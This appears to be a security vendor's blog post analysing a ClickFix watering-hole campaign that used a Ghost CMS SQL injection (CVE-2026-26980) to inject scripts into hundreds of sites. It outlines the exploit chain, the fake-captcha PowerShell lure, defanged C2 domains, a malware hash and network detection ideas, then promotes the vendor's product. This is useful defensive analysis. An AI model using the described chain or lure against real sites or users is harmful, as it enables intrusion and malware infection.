ClickFixWatering HoleTraffic AnalysisCMS Security

Ghost CMS, ClickFix and the Watering Hole That Wears Harvard's Hostname

CVE-2026-26980 turned 700+ Ghost CMS sites into ClickFix watering holes — Harvard, Oxford and DuckDuckGo among them. The host you trusted is now the distributor.

Zero Hunt Research·May 25, 202609:45·9 min read

Last week the article you read on harvard.edu was not the article Harvard published. It had a JavaScript loader appended at the bottom of the page, a cloaked script that fingerprinted your browser, and — if you passed the filter — an overlay that asked you to verify you were human by pasting a command into Windows Run. The same was true on oxford.ac.uk, on auburn.edu, on a DuckDuckGo property, and on 700+ other domains identified by XLab between 7 and 17 May 2026. The CMS behind all of them was Ghost. The vulnerability behind the JavaScript was CVE-2026-26980, a SQL injection in Ghost's Content API that was patched in February.

Three months of unpatched installs were enough to turn the trust signal inside out. The host name your URL allow-list trusted, the certificate your browser trusted, the CDN cache that fronted the request — all of them green-lit a payload that none of them had ever seen, because the payload was being served by the publisher itself.

The Ghost CMS perimeter that wasn't a perimeter

CVE-2026-26980 was disclosed on 19 February 2026. The CVSS vector reads AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L — unauthenticated, network, low complexity, full read of the database and write to integrity. GitHub's CNA scored it 9.4. NIST scored it 7.5 on the more conservative confidentiality-only reading. Affected versions ran from 3.24.0 to 6.19.0; the fix was 6.19.1. The Ghost team's advisory was explicit: because the Content API key is publicly accessible by design, the only application-level workaround is a WAF rule blocking the literal substring slug:[ in query parameters, and that rule risks breaking legitimate functionality.

SentinelOne reported first in-wild exploitation on 27 February — eight days after the patch. The mass campaign documented by XLab landed more than two months later, on 7 May, against an estate that had clearly not all upgraded. The attack chain was not subtle:

Hit the Content API with the SQLi payload, read out the admin API key from the database.
Authenticate to Ghost's Admin API with the stolen key.
Use the Admin API's article-edit endpoint to append a <script> tag — fingerprintable as ghost_once_footer_* — to every post on the site.
The script loaded a two-stage cloaker derived from the commercial Adspect traffic-distribution kit. Crawlers, security scanners, IPs from cloud ASNs, and visitors who failed a browser-fingerprint check were served the original article unchanged.
Visitors who passed the filter received an iframe overlay imitating Cloudflare's "verify you are human" interstitial — the ClickFix lure.

The breakdown of compromised sites is not a long-tail noise distribution. Per XLab's telemetry: personal blogs 48.1%, SaaS/tech 14.8%, AI/ML 4.6%, crypto/Web3 2.9%. That tilts heavily toward audiences whose laptops have CI credentials, source-code checkouts, AWS sessions, and wallet keys. The attackers chose Ghost not because it is popular but because the audience of Ghost-hosted publications is high-value per click.

What ClickFix actually delivers in 2026

ClickFix is not a vulnerability. It is a UX exploit against the Windows Run dialog and the user's clipboard. The fake captcha copies a PowerShell one-liner to the clipboard, then instructs the user to press Win+R and paste-and-run it to "complete verification". The pasted command typically resolves a domain, downloads a stager, and hands off to a second-stage loader. The chain is invisible to email filtering, EDR memory protection on the parent process, and most network egress controls — because the parent process is cmd.exe or powershell.exe launched by the human.

In the Ghost campaign, XLab tracked the chain through these C2 / staging domains used by the two operator clusters they identified:

Operator	Domains used
Threat Actor A	`clo4shara[.]xyz`, `cloud-verification[.]com`, `jalwat[.]com`, `com-apps[.]cc`, `web-telegram[.]ug`
Threat Actor B	`staticcloudflare[.]pro`, `script-dev[.]digital`, `script-dev[.]buzz`, `cdnupdatenews[.]top`

The final payload the team reverse-engineered was UtilifySetup.exe (MD5 18a7251ddde77ed24bc54700d84d9be1), an Inno Setup installer wrapping a modified Electron build derived from the open-source Grape project. It establishes persistence via setLoginItemSettings and beacons to C2 every 30 seconds, awaiting instructions that can run arbitrary JavaScript or execute additional binaries.

The Ghost campaign is one of many. Microsoft Threat Intelligence identifies Lumma Stealer as the most prolific ClickFix payload and tracks campaigns hitting "thousands of enterprise and end-user devices globally every day." Sekoia documented a single WordPress-targeting framework, IClickFix, compromising more than 3,800 sites across 82 countries since December 2024. ClickFix kits are sold on monthly subscription for $200–$1,500. Huntress identified a January 2026 variant called CrashFix that crashes Chrome on purpose and then presents a fake recovery prompt. Microsoft documented a February 2026 DNS-tunnelled variant where the pasted command pulls its second-stage URL out of an nslookup reply, bypassing URL-based blocklists entirely.

Why allow-lists, reputation feeds and CDN edges go blind

The defensive layers that block bad traffic from getting in are looking the wrong way for this attack class. Consider what happens when an analyst's laptop fetches an article from harvard.edu:

The DNS resolver answers with Harvard's IP. The reputation tier rates that domain "permit".
The TLS handshake completes against a Cloudflare edge holding a valid Harvard wildcard certificate. The certificate-transparency log does not flag it.
The corporate proxy logs an HTTPS GET with Referer: <internal Slack>, status 200, 184 KB response. The category is Education.
The SIEM correlates none of this with anything because none of it is anomalous.

Forty seconds later, the same laptop opens a connection to script-dev[.]digital over TLS 1.3, fetches a 12 KB JavaScript blob, and follows that with an HTTPS request to com-apps[.]cc/11z77u3.php. Eight minutes after that, a freshly launched powershell.exe reaches out to cdnupdatenews[.]top over 443 every thirty seconds, with a payload size distribution that matches an Electron beacon.

Almost every layer in the first sequence said trust. The second sequence is the actual breach. The question every defender should be asking right now is: which layer in your stack sees the link between the first and the second, in time to interrupt the beacon?

"We had clean logs from the URL filter, clean logs from the EDR, clean logs from the CASB. The first thing that told us something was wrong was an outbound flow our NDR labelled as a never-seen Electron beacon to a domain registered six days earlier. The visit to the poisoned article was twelve minutes before that. None of the upstream controls saw it because they were all looking at the source."

That is approximately the conversation we have with security teams every week. The source is reputable. The destination is not. The window between them is short. None of the conventional reputation-and-category layers were architected to close it.

The detection surface is the network, while the beacon is alive

The only sensor that catches this class of attack reliably is one looking at the traffic, not at the URL category or the file hash. Three behavioural signatures are visible to wire-speed deep-learning models within seconds of the first beacon:

Domain newness vs session profile. A laptop whose 30-day baseline contains zero connections to a domain whose registration is younger than its baseline window, contacted within minutes of a browser session that finished a fetch to an unrelated reputable host, in a sustained 30-second cadence.
Application-fingerprint mismatch. TLS JA4/JA4S signatures and packet-size distributions that say Electron, not Chrome — emerging from a host whose normal profile is browser-only.
C2 cadence vs human cadence. Periodic outbound on a non-business-hours schedule, with payload entropy and inter-arrival times that match a beacon, not a polling app.

None of these need a known IOC. None of them need a signature for UtilifySetup.exe. They are behavioural signals that a wire-speed traffic ML model picks up the first time the beacon fires — which is also the first opportunity to interrupt it before lateral movement or credential exfiltration happens. For the same reason, mid-encryption ransomware and mid-egress data exfiltration are caught by the same class of sensor: the network sees the consequence of the breach before the disk or the SIEM does.

For the CMS operator: the perimeter you actually need to validate

If you run a Ghost installation, or a WordPress site, or a Drupal stack — and the past 30 days proved you can run all three at once — the operational question is not "are we patched?". It is: would a continuous adversarial validation catch the exploit chain end-to-end on our specific deployment, this week, against the version we are actually running, including the WAF rules that were supposed to mitigate the unpatched window?

That is the gap between a quarterly pentest and a continuous one. CVE-2026-26980 was patched on 19 February. The mass campaign hit on 7 May. The 77-day window in between is exactly the cadence at which annual or quarterly assessment cycles fail: the report on your desk says "Ghost up to date as of last audit" while the live instance is two minor versions behind because someone deferred the upgrade. Continuous validation closes that window because it re-runs the chain — recon → exploit → API key extraction → article modification — on every cadence, against the deployment as it actually is, not as it was at last audit.

How Zero Hunt closes both halves of this

This article is about a class of attack that has two distinct defensive surfaces, and Zero Hunt's appliance is one of the few platforms that addresses both from a single sensor.

On the visitor-side — the surface this article centres on — the AI Traffic Analysis pillar runs a proprietary deep-learning model with four parallel inference heads (suspicious traffic, malware classification, attack-type identification, application fingerprinting) at 2.7+ Gbit/s on the appliance GPU. It is the sensor that flags the never-seen Electron beacon to script-dev[.]digital thirty seconds after the laptop visited a poisoned article on harvard.edu, while the C2 channel is still alive and before the credential stealer has finished its first pass over the ~/.aws/ directory. It does this with the model running locally on the appliance, with no cloud callback and no telemetry leaving the network.

On the CMS-operator side, the 10-agent generative pentest swarm (Recon → Web → Exploit → Credential → Post-Exploit → Pivot → Tactic → Report, coordinated by the AI Controller) re-runs the CVE-2026-26980 chain end-to-end against your live deployment on every scheduled or change-triggered campaign — with each exploit written per-target by the local LLM, backtested in AI Gym against the 316-exercise Vulhub corpus before promotion, and the final evidence chain ECDSA-signed for the Trust Center bundle. If your patch state regresses, if a new asset shows up on the perimeter, or if a downstream WAF rule turns out not to mitigate what it claimed to mitigate, the chain runs and the result lands in the audit trail within the hour.

Both pillars run on the same on-prem appliance. No exploit and no traffic capture ever leaves the customer's network.

The publisher was Harvard. The distributor was Ghost. The defender now has to be the network.

Sources for this article — XLab/Qianxin technical writeup, 7–24 May 2026; BleepingComputer, 24 May 2026; NVD CVE-2026-26980; GitHub advisory GHSA-w52v-v783-gw97; Microsoft Threat Intelligence on ClickFix; SentinelOne CVE database.